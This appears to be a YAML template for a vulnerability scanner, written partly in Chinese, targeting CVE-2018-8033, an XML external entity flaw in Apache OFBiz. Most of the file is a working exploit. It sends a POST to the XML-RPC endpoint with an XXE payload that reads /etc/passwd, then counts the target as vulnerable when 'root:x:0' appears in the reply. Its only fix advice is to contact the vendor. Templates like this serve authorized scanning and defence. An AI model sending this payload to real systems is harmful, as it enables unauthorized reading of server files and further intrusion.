product: Apache-OFBiz
vName: Apache-OFBiz外部实体注入
type: 外部实体注入
vID:
  - CVE-2018-8033
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /webtools/control/xmlrpc
      header:
        Content-Type: application/xml
      data: <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and
          header:
            value:
              - Content-Type
              - text/xml
            logic: and